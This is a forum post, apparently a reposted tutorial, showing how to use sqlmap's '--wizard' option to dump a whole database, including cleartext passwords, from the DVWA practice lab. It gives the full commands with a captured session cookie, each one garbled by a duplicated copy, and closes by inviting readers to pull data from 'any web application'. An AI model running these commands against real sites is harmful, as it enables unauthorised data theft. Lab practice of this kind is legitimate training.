• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Website Database using Sqlmap Wizard

RealFrankLucas

SQL Injector
R Rep
0
0
0
Rep
0
R Vouches
0
0
0
Vouches
0
Posts
166
Likes
18
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
Purple-and-Pink-Brand-Guidelines-Presentation-1.png


Hey Folks, we have again come up with another topic which is related to sqlmap tool. In this tool tutorial we will cover the “wizard” feature of the sqlmap tool which will help speed up our work. Usually we first dump the database, then their tables, columns and so on and thus it takes a lot of time to dump the complete database of the web application, So for not doing the whole process we will just add a keyword “wizard” which will automatically dump the entire database in the web application.

Lets try it 🙂 !!

DVWA

We’ll use the DVWA vulnerable web application to demonstrate this feature of the sqlmap tool. But if you have not configured this web application then you can configure it by going here. When we enter a numeric string after it enters the SQL injection section, we get information about users on the web application, which seems like that the web application is vulnerable to the vulnerability of SQL injection.

1-15.png


Now at this time we will need the cookies of current users to use this tool feature. Let’s open the brupsuite tool, intercept the request and copy the highlighted text as shown in the image below.

2-19.png

Basic and Normal

You just need to execute the following command by changing the value of the cookie according to you. After activate the wizard feature of this tool you get level, risk and enumerate options in which we’ll select option first in both choices.

Usage 🙂 !! sqlmap -u “< URL >” –cookie < cookies > –wizard

sqlmap -u "http://192.168.1.13/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74" --wizard1sqlmap-u"http://192.168.1.13/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#"--cookie="security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74"--wizard

3-16.png


After choosing the difficulty and risk level normal, we only obtain information related to the database present in the web application.

4-15.png

Medium and Intermediate

Now we will move the level of risk from normal to medium and as well as from basic to intermediate of enumeration, which means we will select the second option of the both choice.

Usage 🙂 !! sqlmap -u “< URL >” –cookie < cookies > –wizard

sqlmap -u "http://192.168.1.13/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74" --wizard1sqlmap-u"http://192.168.1.13/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#"--cookie="security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74"--wizard

5-14.png


After increase the levels of risk and enumeration then we get a lot more information than before.

6-13.png


As you can see it dumped the database name, their tables, columns and user details.

7-14.png

High and All

Again we will move the level of risk from medium to high and as well as from intermediate to all of enumeration, which means we will select the third option of the both choice.

Usage 🙂 !! sqlmap -u “< URL >” –cookie < cookies > –wizard

sqlmap -u "http://192.168.1.13/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74" --wizard1sqlmap-u"http://192.168.1.13/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#"--cookie="security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74"--wizard

8-13.png


Amazing 🙂 !! Now it has dumped the users’ password in clear text.

9-14.png


We had selected the “all” option during the choice, which is why it dumped all important information from the web server.

10-12.png


Done 🙂 !! Similarly, you can easily get data from any web application database by entering some numeric digit.

11-12.png
About the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
 

422,212

310,551

310,560

Top